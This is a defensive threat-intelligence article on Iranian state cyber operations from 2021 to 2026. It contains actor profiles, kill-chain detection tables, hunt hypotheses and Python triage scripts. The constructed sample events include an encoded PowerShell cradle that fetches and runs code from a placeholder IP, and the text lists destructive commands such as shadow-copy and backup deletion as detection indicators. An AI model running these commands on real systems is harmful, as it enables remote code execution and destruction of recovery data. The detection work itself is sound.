Executive Summary
As of March 2, 2026, the United States, Israel, and Iran are operating in an active multi-domain conflict environment. Cyber operations are not parallel to kinetic events — they are integrated components of escalation management, deterrence signaling, and retaliation.
However, effective defense in 2026 requires understanding how Iranian cyber tradecraft evolved from 2021 onward, not just reacting to current headlines.
The most important defensive insight:
The techniques used in 2026 were built incrementally through campaigns executed between 2021 and 2025.
This article analyzes that progression and translates it into concrete detection and defensive strategy guidance.
Detection & Strategy Disclaimer
The thresholds and detection logic in this document are illustrative, not prescriptive. Values such as replay windows (e.g., 10–15 minutes), exfil size limits, burst timing, or file modification rates must be tuned to your environment. Network design, workforce geography, cloud setup, logging depth, OT/IT segmentation, and normal user behavior all affect what is “anomalous.” There is no universal threshold — only environment-calibrated detection.
Geopolitical Context: Why It Matters to Defenders
Iran’s cyber operations are not calendar-driven — they are event-triggered.
Kinetic escalation reliably predicts cyber escalation. If missiles move, packets follow.
Understanding the conflict timeline helps you anticipate when to raise monitoring thresholds, shorten patch SLAs, and shift into escalation posture.
Strategic Shift
With conventional assets degraded and IRGC leadership losses, asymmetric retaliation intensifies, and cyber becomes the primary scalable response mechanism.
Operational Implication for SOC & Threat Hunters
Geopolitical events are not background noise. They are early-warning indicators for cyber posture adjustment.
When escalation occurs:
Expect attack volume increase within 72–96 hours
Shorten edge patch timelines immediately
Elevate monitoring on VPN, identity, and OT systems
Treat DDoS waves as potential masking for intrusion
Part I — Strategic Pattern (2021 → 2025)
Iranian cyber operations from 2021–2026 show four consistent characteristics:
Operational aggression paired with asymmetric pragmatism
Blended espionage + disruption within the same intrusion
Preference for legitimate tooling and low-noise tradecraft
Escalation-driven tempo spikes
The tactical stack evolved, but the doctrine remained consistent:
Gain access
Extract intelligence
Preserve access
Escalate impact when geopolitically useful
Understanding the evolution of those steps is critical.
What Changed in Iran’s Cyber Operations Post–June 2025
1. Hacktivist–State Blurring Became Operational Reality
The line between IRGC cyber units and “independent” hacktivists effectively disappeared.
Analysis of 250,000+ Telegram messages across 178+ groups showed:
Shared target lists
Live vulnerability exchange
Attack timing aligned with military developments
This was not organic activism — it was coordinated orchestration.
Key proxy clusters activated:
Fatimion Cyber Team — DDoS against Israeli government portals
Cyber Fattah — Data theft and defacement (logistics, healthcare)
Cyber Islamic Resistance — Critical infrastructure reconnaissance
Cotton Sandstorm (Emennet Pasargad) — Influence ops + hack-and-leak
Defensive takeaway: Treat “hacktivist” activity during escalation as potential state-aligned reconnaissance or masking noise — not just nuisance DDoS.
2. Pioneer Kitten Formalized the Initial Access Broker Model
Pioneer Kitten (Fox Kitten / Lemon Sandstorm) expanded from VPN exploitation into structured initial access brokerage.
Compromised enterprise access was sold to ransomware groups (e.g., NoEscape, ALPHV/BlackCat), allowing Iran-linked operators to:
Monetize espionage footholds
Maintain plausible deniability
Offload destructive payloads to criminal actors
Detection implication: A VPN exploit followed by quiet lateral movement may later surface as “commodity ransomware.” The IAB layer obscures nation-state fingerprints at impact.
3. Cyber as ISR: Agrius Camera Exploitation
Post-strike activity revealed Agrius scanning and accessing internet-connected cameras to assess physical damage.
This marked a doctrinal shift: Cyber access used as real-time ISR (intelligence, surveillance, reconnaissance) supporting kinetic awareness.
Detection implication: Unexpected outbound traffic from CCTV/NVR systems to foreign IP space should be investigated as potential reconnaissance — not dismissed as benign telemetry.
4. GenAI-Enhanced Phishing at Scale
APT42 (Agent Serpens / Charming Kitten) began deploying AI-generated malicious documents impersonating credible institutions (e.g., RAND).
Impact:
Fluent, context-aware English
Accurate references to target research
Realistic document formatting
The traditional phishing red flag — poor grammar — is obsolete.
Defensive takeaway: Detection must rely on behavioral signals (token replay, device mismatch, anomalous OAuth activity), not content quality.
5. Operational Tempo Accelerated
Israeli National Cyber Directorate alerts:
2023: 367
2024: 736 (518 high-confidence “red alerts”)
2025: On track to exceed 2024
The year-over-year doubling reflects not just better detection — but genuine escalation in operational volume and aggressiveness.
Strategic implication: Cyber tempo now tracks geopolitical escalation within 72–96 hours. SOC posture must adapt accordingly.
Current Target Prioritization (Post-June 2025)
Iran's targeting has expanded well beyond Israeli infrastructure in the escalation environment:
Priority Tier | Target Category | Rationale |
Tier 1 | Israeli government, defense, aerospace, energy | Direct retaliation targets |
Tier 1 | US military and defense contractors | Retaliation for US strikes on nuclear facilities |
Tier 2 | US critical infrastructure (water, energy, healthcare, IT) | Strategic deterrence positioning; Unitronics precedent |
Tier 2 | Gulf states (UAE, Saudi Arabia, Bahrain) | Regional adversaries/normalized with Israel |
Tier 3 | Western European governments with ties to strike coalition | Broader pressure campaign |
Tier 3 | Jewish diaspora organizations and institutions globally | Psychological and data operations |
Detection Posture Adjustment for the Escalation Environment
The following threat hunt priorities should be elevated immediately for any organization in Tier 1 or Tier 2:
VPN/edge device exploitation monitoring — Pioneer Kitten specializes in N-day VPN exploits. Any unpatched Fortinet, Pulse Secure, Cisco SSL-VPN in your environment is an active target.
OT/ICS internet exposure audit — Run Shodan scan against your own IP ranges for OT protocol banners (ports 102, 502, 20256, 2404, 44818) immediately. Remove any exposure found.
MFA fatigue / push bombing detection — Elevated tempo means increased MFA spam attacks. Monitor for >3 MFA push notifications to a single user within 5 minutes from foreign IP.
Agrius-style camera scanning — If your organization operates network-connected cameras, check for unexpected outbound connections from camera management systems or NVRs to non-update-service external IPs.
AI-generated phishing awareness — Brief security teams and high-value targets (executives, researchers, policy staff): AI-generated phishing from Iran now reads fluently and references real, relevant content. Grammar quality is no longer a reliable indicator of malicious email.
Ransomware IAB access sale awareness — If you detect a Pioneer Kitten-style VPN intrusion (N-day exploit, living off the land, no immediate ransomware), treat it as a ransomware precursor. The intrusion may be sold to a criminal ransomware group within days of access validation.
Threat Actor Landscape
Common Name | Alt Name | Linked To | Primary Mission | Primary Targets |
Charming Kitten | TA453, APT42, APT35, PHOSPHORUS, Mint Sandstorm | IRGC Intelligence Organization (IRGC-IO) | Influence ops, credential theft | Journalists, researchers, dissidents, nuclear policy |
MuddyWater | MERCURY, TA450 | MOIS (Ministry of Intel) | Espionage, ransomware pivot | Government, telecom, energy, defense |
APT34 / OilRig | Hazel Sandstorm | MOIS | Deep persistent espionage | Government, oil/gas, aviation, finance (Middle East) |
APT33 | Refined Kitten | IRGC | Destructive + espionage | Aerospace, energy, defense |
CyberAv3ngers | — | IRGC Cyber-Electronic Command (IRGC-CEC) | Cyber-kinetic, OT disruption | Israeli infra, water/energy, US utilities |
Handala | — | IRGC/MOIS (assessed) | Destructive wiper, psyops | Israel, Gulf states |
Agrius | — | MOIS | Destructive wiper under ransomware cover | Israel, Gulf states, Iran dissidents |
Screening Serpens | — | MOIS | Masquerade as Israeli company, data theft | Iranian dissidents, dual nationals |
Key distinction: Iran operates multiple distinct cyber units across IRGC (Islamic Revolutionary Guard Corps) and MOIS (Ministry of Intelligence), with different mandates:
IRGC units: More aggressive, willing to conduct destructive and kinetically-integrated operations
MOIS units: More patient, focused on espionage, influence operations, targeting regime critics
Part II — Campaign Evolution Analysis (2021–2025)
2021–2022: Espionage-First with Occasional Disruption
Characteristic: Traditional spear-phishing for espionage; occasional OT targeting; beginning of credential harvesting at scale
Tooling: Open-source post-exploitation frameworks (PowerShell Empire) alongside custom VBS/PowerShell droppers and RATs, Mimikatz, web shells
Detection profile: MEDIUM — tooling has signatures, behavior is detectable with good EDR
2022–2023: MFA Bypass and Credential Industrialization
Characteristic: Mass-scale AiTM phishing (EvilGinx2) for credential/session token theft; ISP-level DNS hijacking for government targets
Tooling: EvilGinx2, custom phishing frameworks, ISP-level DNS manipulation
Detection profile: LOW for EvilGinx2 (bypasses MFA, appears as legitimate auth); VERY LOW for ISP DNS hijack
Defining campaign: TA453 EvilGinx2 global credential harvesting
2023–2025: Cyber-Kinetic Escalation (Gaza Conflict Era)
Characteristic: Gaza conflict triggered unprecedented tempo; OT targeting (Unitronics, water/energy); wiper + psyops (Handala); ransomware pivot normalized
Tooling: BitLocker-based ransomware, custom wipers, OT-specific tooling, EvilGinx2 continued at scale
Detection profile: VARIED — OT attacks are simple but effective; ransomware pivot is detectable in pre-deployment phase
Defining campaigns: Unitronics/US water utilities, Handala wiper ops, CyberAv3ngers Israeli infra
2025–2026: Persistent Access Programs + AI-Assisted Phishing
Characteristic: Development of long-duration persistent access (shifting from hit-and-run to dwell); AI-generated spear-phishing content personalized at scale
Emerging: AI-assisted phishing dramatically reduces production time for high-quality personalized spear-phish; AI voice cloning used in some social engineering calls
Unique threat: Iran's combination of espionage + ransomware + psyops in single operations with escalating OT capability
Part III — Full Kill Chain: Phase-by-Phase TTPs with Detection Logic
Phase 1 – Reconnaissance
Phase | TTP | MITRE ID | Derived From | Detection / Controls |
Recon | Social Media Profiling of Targets | T1593.001 | Charming Kitten profiling via Twitter, LinkedIn, academic publications, conference attendance before crafting personalized lures | Detection limited for OSINT. Compensating control: reduce professional information exposure. Employees should not publicly disclose research focus, org structure, or security tooling. |
Recon | Scanning for Exposed OT/ICS Systems | T1596.005 / T1595.001 | CyberAv3ngers / IRGC Shodan-based discovery of internet-exposed Unitronics PLCs | 1. Regular internet exposure scans (Shodan, Censys). 2. Any OT device internet-visible = emergency remediation. 3. Audit all WAN-facing IPs due to IT/OT convergence risk. |
Phase 2 – Initial Access
Phase | TTP | MITRE ID | Derived From | Detection Logic |
Initial Access | Phishing with Malicious Links / AiTM Proxy | T1566.002 + T1539 | Charming Kitten EvilGinx2 campaigns | Email Gateway: Newly registered domain (<30 days), not in top 1M, domain spoofing major provider, Let’s Encrypt cert → sandbox before delivery.DNS/Proxy: Domain similar to Microsoft/Google + TTL < 60 seconds. |
Initial Access | Exploit Public-Facing Application (VPN/Remote Access) | T1190 | MuddyWater VPN exploitation (Fortinet, Pulse, Check Point) | VPN Logs: Auth failure → success from same IP within 60 min.Management API accessed externally.POST to authenticated endpoint without valid session. |
Key CVEs Exploited (2021–2025):
CVE-2022-42475 (Fortinet FortiOS SSL-VPN heap-based buffer overflow)
CVE-2024-21762 (Fortinet FortiOS SSL-VPN out-of-bounds write)
CVE-2021-22893 (Pulse Connect Secure authentication bypass)
CVE-2019-11510 (Pulse Secure arbitrary file read, credential disclosure)
Phase 3 – Execution & Persistence
Phase | TTP | MITRE ID | Derived From | Detection Logic |
Execution | PowerShell-Based Dropper | T1059.001 | MuddyWater POWERSTATS | Sysmon 1: EncodedCommand, Office → PowerShell spawn, outbound HTTP/HTTPS not matching approved infra.PS 4104: Invoke-RestMethod / Invoke-WebRequest to non-approved domain + persistence via scheduled task/startup. |
Persistence | Web Shell Deployment | T1505.003 | APT34/OilRig web shells (HYPERSHELL, TWOFACE) | Sysmon 11: w3wp/httpd creates .aspx/.php/.jsp in web root.Web Logs: Suspicious POST to web shell path, abnormal/empty User-Agent, IP outside admin range. |
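Worked example of the Execution-row logic above, added here and not part of the original article: it triages constructed Sysmon Event ID 1 records for an Office parent spawning PowerShell, decodes any -EncodedCommand payload (base64 of UTF-16LE text) and searches the decoded script for download-cradle primitives. Field names follow the Sysmon schema; the host names, user names, IP address and sample events are constructed for the example.

```python
import base64
import re

# Office applications that should not normally spawn PowerShell.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe", "powershell_ise.exe"}

# Download-cradle and in-memory execution primitives typical of PowerShell stagers.
CRADLE_PATTERNS = (
    r"invoke-webrequest", r"invoke-restmethod", r"net\.webclient", r"downloadstring",
    r"downloadfile", r"invoke-expression", r"\biex\b", r"start-bitstransfer", r"frombase64string",
)
# -e / -ec / -enc / -EncodedCommand followed by a base64 blob.
ENCODED_FLAG = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def decode_encoded_command(cmdline: str):
    """Return the script behind -EncodedCommand (base64 of UTF-16LE), or None if absent/invalid."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def find_cradles(text: str):
    """Return the cradle patterns present in the text, sorted for stable output."""
    return sorted(p for p in CRADLE_PATTERNS if re.search(p, text, re.IGNORECASE))


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def triage_event(event: dict) -> dict:
    """Score one Sysmon Event ID 1 record: Office parent + encoded command + cradle => high."""
    parent, image = _basename(event.get("ParentImage", "")), _basename(event.get("Image", ""))
    cmdline = event.get("CommandLine", "")
    decoded = decode_encoded_command(cmdline)
    office_spawn = parent in OFFICE_PARENTS and image in POWERSHELL
    cradles = find_cradles(cmdline + " " + (decoded or ""))  # check raw and decoded forms
    score = int(office_spawn) + int(decoded is not None) + int(bool(cradles))
    severity = ("info", "low", "medium", "high")[score]
    return {"host": event.get("Computer"), "user": event.get("User"), "severity": severity,
            "office_spawn": office_spawn, "decoded": decoded, "cradles": cradles}


def _encode(script: str) -> str:
    """Encode a script the way PowerShell expects it for -EncodedCommand (builds the sample)."""
    return base64.b64encode(script.encode("utf-16-le")).decode()


# Constructed Sysmon EID 1 records, not real telemetry.
SAMPLE_EVENTS = [
    {"Computer": "WS-FIN-07", "User": "CORP\\jsmith",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc "
                    + _encode("IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.23/u')")},
    {"Computer": "SRV-APP-02", "User": "CORP\\svc_deploy",
     "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\Deploy\rotate-logs.ps1"},
]


def triage_all(events):
    return [triage_event(e) for e in events]


if __name__ == "__main__":
    for r in triage_all(SAMPLE_EVENTS):
        print(r["severity"].upper(), r["host"], r["cradles"], (r["decoded"] or "")[:60])
```

The decode step matters because signature-based content inspection never sees the cradle in the raw command line; correlating the decoded script with the Office parent is what lifts this from "PowerShell ran" to a high-severity dropper alert.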
Phase 4 – Privilege Escalation & Defense Evasion
Phase | TTP | MITRE ID | Derived From | Detection Logic |
Priv Esc | Kernel Exploits | T1068 | MuddyWater / APT34 LPE usage | Sysmon 1 + WinSec 4688: medium-integrity user process spawning a SYSTEM-integrity child with no corresponding UAC elevation. WinSec 4672/4673: SeDebugPrivilege / SeBackupPrivilege assigned to or used by an unexpected account. |
Defense Evasion | Disable Security Tools | T1562.001 | MuddyWater Defender tampering | WinSec 4719 + Sysmon 13: DisableAntiSpyware registry key change, AV exclusions added, service stop targeting AV.PS 4104: Set-MpPreference -DisableRealtimeMonitoring or Add-MpPreference -ExclusionPath. |
Phase 5 – Credential Access
Phase | TTP | MITRE ID | Derived From | Detection Logic |
Credential Access | AiTM Session Cookie Theft | T1557 | Charming Kitten EvilGinx2 | Entra ID Logs: MFA success + same session token used from geo-distinct IP within 10 min.Browser Telemetry: Unexpected certificate issuer for Microsoft/Google domain. |
Credential Access | LSASS Dumping | T1003.001 | MuddyWater / APT34 | Sysmon 10: TargetImage=lsass.exe, GrantedAccess 0x1010 or 0x1fffff, SourceImage not EDR-whitelisted. |
Phase 6 – Lateral Movement
Phase | TTP | MITRE ID | Derived From | Detection Logic |
Lateral Movement | SMB/WMI Remote Execution | T1021.002 / T1021.003 | MuddyWater PsExec-style movement | WinSec 4624 + 4648: Logon Type 3 NTLM from workstation → server using LSASS-harvested creds.Sysmon 1: services.exe spawning unexpected child process. |
Lateral Movement | Valid Accounts via Stolen Web Credentials | T1078.004 | APT34 DNS hijack / web credential theft | Successful login from never-before-seen IP + unusual country + no prior MFA event. |
Phase 7 – Collection & Exfiltration
Phase | TTP | MITRE ID | Derived From | Detection Logic |
Collection | Email Export + Archive | T1114.002 + T1560.001 | APT34 mail export pattern | Exchange Audit: New-MailboxExportRequest by non-admin.Sysmon 1/File: PST in non-standard path + archive in Temp/Public + immediate outbound transfer. |
Exfiltration | Cloud Upload | T1567 | APT34 / MuddyWater | DLP/Proxy: Upload >500MB to MEGA/pCloud/unknown cloud or previously unseen external destination. |
Phase 8 – OT/ICS Targeting
Layer | Focus | Detection Logic |
Layer 1 | Network Visibility | Passive OT monitoring (Claroty/Dragos/Nozomi). Any ICS protocol from IT network to OT = immediate alert. |
Layer 2 | Setpoint Monitoring | Setpoint changes outside baseline or business hours or from non-HMI workstation. |
Layer 3 | Remote Access | Direct internet → OT connection OR VPN user accessing OT directly OR ICS protocol traffic on IT segments. |
Why IT tools miss OT:
PLCs use RTOS (no EDR)
Legacy auth weak/default
ICS protocols not inspected by firewalls
Incomplete asset inventory
Phase 9 – Impact
Phase | TTP | MITRE ID | Derived From | Detection Logic |
Impact | BitLocker Ransomware Pivot | T1486 | MuddyWater / Agrius | Pre-Ransom Indicators:Day 1–7: vssadmin list shadows, net view /all, AD enumeration.Day 7–14: vssadmin delete shadows /all, wbadmin delete backup, bcdedit recovery disable.Day 14–21: manage-bde -on mass execution.Alert: ANY vssadmin delete shadows = high severity. |
Impact | Defacement / PsyOps | T1491.002 | Handala / CyberAv3ngers | WAF/FIM: index.html/index.php modified outside CMS pipeline OR homepage hash change. Immediate visibility impact. |
Detection Engineering Master Matrix
Phase | TTP | MITRE ID | Log Source | Key Event ID / Indicator | Actor |
Initial Access | AiTM phishing (EvilGinx2) | T1566.002 | Proxy / Email GW | Link to newly-registered domain similar to major service | Charming Kitten |
Initial Access | VPN exploit | T1190 | VPN/Edge logs | Auth bypass or management access from external IP | MuddyWater |
Initial Access | OT/ICS default credentials | T1078.001 | OT system logs | Auth to Unitronics/PLC from non-engineering IP | CyberAv3ngers |
Execution | PowerShell dropper | T1059.001 | Sysmon 1 + PS 4104 | Office app spawns PS with encoded command | MuddyWater |
Persistence | Web shell | T1505.003 | Sysmon 11 | w3wp.exe creates .aspx in web root | APT34 |
Credential Access | EvilGinx2 session token theft | T1539 | Entra ID Sign-in | Post-auth session replay from different geo | Charming Kitten |
Credential Access | LSASS dump | T1003.001 | Sysmon 10 | lsass.exe access GrantedAccess 0x1fffff | MuddyWater, APT34 |
Defense Evasion | Disable Windows Defender | T1562.001 | Sysmon 13 | Registry key DisableAntiSpyware set | MuddyWater |
Pre-Impact | BitLocker staging | T1486 | Sysmon 1 | manage-bde.exe -on from non-admin account or host outside BitLocker policy | MuddyWater, Agrius |
Lateral Movement | SMB/WMI remote execution | T1021.002 | WinSec 4624 | NTLM Type 3 logon from workstation to server | All Iran |
Collection | Mail export + archive | T1114.002 | Exchange audit | New-MailboxExportRequest + 7zip/WinRAR activity | APT34 |
Collection | DNS hijack via ISP | T1557 | CT log monitoring | Unexpected certificate issued for org domain | APT34 |
Exfiltration | Upload to cloud storage | T1567 | DLP/Proxy | Large upload to MEGA/cloud from internal host | APT34, MuddyWater |
Pre-Impact | VSS deletion | T1490 | Sysmon 1 | vssadmin delete shadows /all | MuddyWater, Agrius |
Impact | BitLocker ransomware | T1486 | Sysmon 1 | manage-bde.exe mass deployment | MuddyWater, Agrius |
Impact | Wiper deployment | T1485 | Sysmon 11 | Mass file deletion + MBR write | Handala, Agrius |
Impact | OT setpoint manipulation | T0855 | OT passive capture | ICS command from non-HMI source | CyberAv3ngers |
Psyops | Defacement | T1491.002 | FIM / WAF | Web content modified outside deployment process | Handala |
Part IV — Threat Hunt Hypotheses
These hunts complement EDR/ITDR alerting. Mature platforms may detect portions or most of this activity, but correlation, tuning, and escalation logic determine whether an intrusion is caught pre-impact or post-encryption.
Hunt 1: EvilGinx2 — Session Token Replay
Hypothesis: AiTM proxy captured a session token and replayed it from a different IP/device.
Note: Mature ITDR platforms often alert on impossible travel or token anomalies — validate coverage before building custom logic.
Core Detection Logic:
MFA-complete sign-in → record session token + IP
Same session token used within short window (env-tuned) from different IP
Geo-inconsistent access OR device/user-agent mismatch
No corresponding MFA re-challenge
High Confidence:
Same session ID + geo inconsistency
Session ID + changed user-agent/device fingerprint
Hunt 2: Pre-Ransom Staging (MuddyWater / Agrius)
Hypothesis: Actor is transitioning from espionage to destructive phase.
Core Detection Stack (correlate within 48h window, tune per environment):
vssadmin delete shadows
bcdedit /set recoveryenabled No
wbadmin delete
manage-bde -on (outside policy)
Escalation Logic:
1 indicator → HIGH
2+ indicators on same host → CRITICAL
manage-bde -on on server without GPO → immediate containment
Many EDR tools detect shadow copy deletion — correlation is the differentiator.
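Hunt 2 as runnable correlation logic, added here as an example and not part of the original article. It classifies constructed process-creation command lines into the four staging indicators listed above, counts distinct indicators per host inside a trailing 48-hour window, and applies the escalation logic: one indicator HIGH, two or more CRITICAL, and manage-bde -on on a server outside BitLocker policy goes straight to containment. The host roles, the policy-managed host set and the events are constructed assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

FMT = "%Y-%m-%dT%H:%M:%SZ"


def parse_ts(s: str) -> datetime:
    return datetime.strptime(s, FMT)


INDICATORS = {
    "vss_delete":        re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows", re.I),
    "recovery_disabled": re.compile(r"bcdedit(\.exe)?\s.*recoveryenabled\s+no", re.I),
    "backup_delete":     re.compile(r"wbadmin(\.exe)?\s+delete\s+(catalog|systemstatebackup|backup)", re.I),
    "bitlocker_on":      re.compile(r"manage-bde(\.exe)?\s+-on\b", re.I),
}
# Constructed inventory: hosts where BitLocker is turned on by policy, and which hosts are servers.
BITLOCKER_POLICY_HOSTS = {"WS-FIN-07", "WS-HR-12"}
SERVERS = {"SRV-FILE-01", "SRV-DB-03"}

# Constructed process events (Sysmon 1 / 4688 style), not real telemetry.
SAMPLE_EVENTS = [
    {"ts": "2026-02-11T02:10:00Z", "host": "WS-ENG-04", "user": "CORP\\eng-admin",
     "cmdline": "vssadmin.exe delete shadows /all /quiet"},
    {"ts": "2026-02-11T02:12:00Z", "host": "WS-ENG-04", "user": "CORP\\eng-admin",
     "cmdline": "bcdedit.exe /set {default} recoveryenabled No"},
    {"ts": "2026-02-12T23:40:00Z", "host": "SRV-FILE-01", "user": "CORP\\svc_backup",
     "cmdline": "manage-bde.exe -on C: -RecoveryPassword -SkipHardwareTest"},
    {"ts": "2026-02-09T09:00:00Z", "host": "WS-HR-12", "user": "CORP\\it-ops",
     "cmdline": "manage-bde -on C: -RecoveryPassword"},          # policy-managed host: expected
    {"ts": "2026-02-05T10:00:00Z", "host": "WS-OPS-09", "user": "CORP\\ops",
     "cmdline": "wbadmin delete catalog -quiet"},
    {"ts": "2026-02-09T10:00:00Z", "host": "WS-OPS-09", "user": "CORP\\ops",
     "cmdline": "vssadmin delete shadows /for=C: /oldest"},      # 4 days later: outside the window
    {"ts": "2026-02-09T10:05:00Z", "host": "WS-OPS-09", "user": "CORP\\ops",
     "cmdline": "vssadmin list shadows"},                        # enumeration only, not an indicator
]


def classify(cmdline: str):
    """Return the indicator name a command line matches, or None."""
    return next((name for name, rx in INDICATORS.items() if rx.search(cmdline)), None)


def correlate_staging(events, window=timedelta(hours=48)):
    """Per host, escalate on distinct indicators seen inside a trailing window (env-tuned)."""
    per_host = defaultdict(list)
    for ev in events:
        name = classify(ev["cmdline"])
        if name is None or (name == "bitlocker_on" and ev["host"] in BITLOCKER_POLICY_HOSTS):
            continue
        per_host[ev["host"]].append((parse_ts(ev["ts"]), name, ev["user"]))

    alerts = []
    for host, hits in per_host.items():
        hits.sort()
        for i, (ts, name, user) in enumerate(hits):
            recent = {n for (t, n, _) in hits[: i + 1] if ts - t <= window}
            if name == "bitlocker_on" and host in SERVERS:
                severity = "CONTAIN"          # BitLocker enabled on an unmanaged server
            elif len(recent) >= 2:
                severity = "CRITICAL"
            else:
                severity = "HIGH"
            alerts.append({"host": host, "ts": ts.strftime(FMT), "user": user, "indicator": name,
                           "distinct_in_window": sorted(recent), "severity": severity})
    return alerts


if __name__ == "__main__":
    for a in correlate_staging(SAMPLE_EVENTS):
        print(a["severity"], a["host"], a["ts"], a["indicator"], a["distinct_in_window"])
```

Shadow-copy deletion on its own is noisy on hosts with backup agents; the value here is that the same host adding recovery-disable or backup-catalog deletion within the window moves it to CRITICAL automatically, and the policy allowlist keeps routine BitLocker rollouts out of the queue.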
Hunt 3: POWERSTATS — Persistent PowerShell C2
Hypothesis: PowerShell implant beaconing at steady interval.
Detection Pattern:
powershell.exe → external HTTP(S)
1–10 connections/hour sustained
Same destination over hours/days
Non-interactive context (SYSTEM/service account)
Correlate with:
Scheduled task creation (4698)
Run key modification (Sysmon 13)
High confidence when:
Regular interval beacon + SYSTEM context
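Hunt 3 as runnable logic, added here as an example and not part of the original article. It groups constructed outbound-connection events (Sysmon 3 or proxy style) by host, process, destination and user, then measures beacon regularity with the coefficient of variation of the inter-arrival times: a SYSTEM-context PowerShell talking to one destination 1–10 times per hour with low jitter for over an hour is flagged, while bursty interactive traffic with a similar average rate is not. Hosts, users, destinations and timings are constructed; every threshold is environment-tuned.

```python
import statistics
from collections import defaultdict
from datetime import datetime, timedelta

FMT = "%Y-%m-%dT%H:%M:%SZ"
SYSTEM_USERS = {"NT AUTHORITY\\SYSTEM", "NT AUTHORITY\\NETWORK SERVICE", "NT AUTHORITY\\LOCAL SERVICE"}


def parse_ts(s: str) -> datetime:
    return datetime.strptime(s, FMT)


def _series(start: str, gaps_s):
    """Constructed timestamps: a start time followed by the given gaps in seconds."""
    t, out = parse_ts(start), [parse_ts(start)]
    for g in gaps_s:
        t += timedelta(seconds=g)
        out.append(t)
    return [x.strftime(FMT) for x in out]


def _events(host, user, dest, stamps, process="powershell.exe"):
    return [{"ts": s, "host": host, "user": user, "process": process, "dest": dest} for s in stamps]


# Constructed network events, not real telemetry.
SAMPLE_EVENTS = (
    # Implant-like: SYSTEM-context PowerShell to one IP every ~10 minutes with small jitter.
    _events("SRV-APP-02", "NT AUTHORITY\\SYSTEM", "198.51.100.23:443",
            _series("2026-02-12T01:00:00Z", [600, 590, 612, 605, 598, 601, 595, 608]))
    # Interactive admin: similar average rate but bursty, irregular gaps.
    + _events("WS-FIN-07", "CORP\\jsmith", "10.20.30.40:443",
              _series("2026-02-12T09:00:00Z", [30, 900, 5, 2000, 60, 15, 700]))
    # Scheduled job: only two connections, below the minimum sample size.
    + _events("SRV-APP-02", "NT AUTHORITY\\SYSTEM", "updates.example.net:443",
              _series("2026-02-12T03:00:00Z", [86400]))
)


def detect_beacons(events, min_count=6, min_hours=1.0, min_interval=360, max_interval=3600, max_cv=0.2):
    """Flag PowerShell connection series with regular inter-arrival times (CV <= max_cv),
    an average of 1–10 connections per hour, sustained for at least `min_hours`."""
    series = defaultdict(list)
    for ev in events:
        if ev["process"].lower() not in ("powershell.exe", "pwsh.exe"):
            continue
        series[(ev["host"], ev["process"], ev["dest"], ev["user"])].append(parse_ts(ev["ts"]))

    findings = []
    for (host, proc, dest, user), times in series.items():
        times.sort()
        if len(times) < min_count:
            continue
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        mean, sd = statistics.mean(gaps), statistics.pstdev(gaps)
        cv = sd / mean if mean else float("inf")
        span_h = (times[-1] - times[0]).total_seconds() / 3600
        if span_h >= min_hours and min_interval <= mean <= max_interval and cv <= max_cv:
            findings.append({"host": host, "process": proc, "dest": dest, "user": user,
                             "count": len(times), "mean_interval_s": round(mean), "cv": round(cv, 3),
                             "hours": round(span_h, 2),
                             "confidence": "high" if user in SYSTEM_USERS else "medium"})
    return findings


if __name__ == "__main__":
    for f in detect_beacons(SAMPLE_EVENTS):
        print(f["confidence"].upper(), f["host"], f["dest"], f["count"], f["mean_interval_s"], f["cv"])
```

Implants that add randomised sleep will push the coefficient of variation up, so tune max_cv against your own beacon simulations rather than trusting the default; the 4698 scheduled-task and Sysmon 13 run-key correlation in the hunt text is what confirms a hit from this stage.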
Hunt 4: APT34 Mail Export + Staging
Hypothesis: Admin-equivalent account exporting mailboxes for exfiltration.
Primary Indicator:
New-MailboxExportRequest by non-standard admin account
Correlate with:
PST in non-Outlook path
Archive creation (.zip/.7z/.rar)
Large outbound upload to non-approved cloud
CRITICAL: Mailbox export from unauthorized account — escalate immediately.
Hunt 5: Internet-Exposed OT Assets
Hypothesis: ICS device exposed externally (Unitronics-style risk).
Procedure:
Enumerate all public IP ranges
Cross-reference Shodan/Censys
Identify ICS protocol banners
Any exposed PLC/ICS port = CRITICAL.
This is prevention, not detection. Close exposure immediately.
Hunt 6: Wiper Pre-Staging / Active Execution
Hypothesis: Destructive payload staged or executing.
Pre-Staging Signals:
Unsigned executable in Windows root/ProgramData/temp
Combined with VSS deletion activity
Active Execution Signals:
Write to \\.\PhysicalDrive0
500 file delete/overwrite events in short burst (tune threshold)
CRITICAL: Raw disk write by unexpected process — isolate host immediately (no reboot).
Part V — Leadership Briefing: Strategic Threat Posture
The Strategic Reality
Iran's cyber threat is fundamentally different from China (patient, intelligence-focused) and Russia (intelligence + wartime kinetics). Iran operates as a reactive, escalatory actor: cyber operations surge in response to geopolitical events (assassinations, sanctions announcements, military strikes), then normalize, then surge again.
The key insight: you don't just monitor Iran threat actors — you monitor the geopolitical context. When Iran-Israel tensions spike, Iran-linked cyber operations against Israeli-adjacent organizations (companies doing business in Israel, companies perceived as pro-Israel, US defense organizations) spike in parallel.
Three Things Leadership Must Understand
1. If you have OT/ICS infrastructure, Iran will try to reach it — and the attack doesn't require sophistication.
The Aliquippa, PA water utility attack required: internet-accessible PLC + default password. That's all. You don't need to have a nation-state-sophisticated security posture to prevent this attack — you just need to ensure your OT devices are not directly internet-accessible. The most impactful defensive investment for organizations with OT infrastructure is OT network segmentation and asset inventory, not advanced threat detection.
Investment priority: OT/IT network segmentation audit, internet exposure scanning of all IP ranges for OT protocol banners, and mandatory credential hygiene for all OT devices.
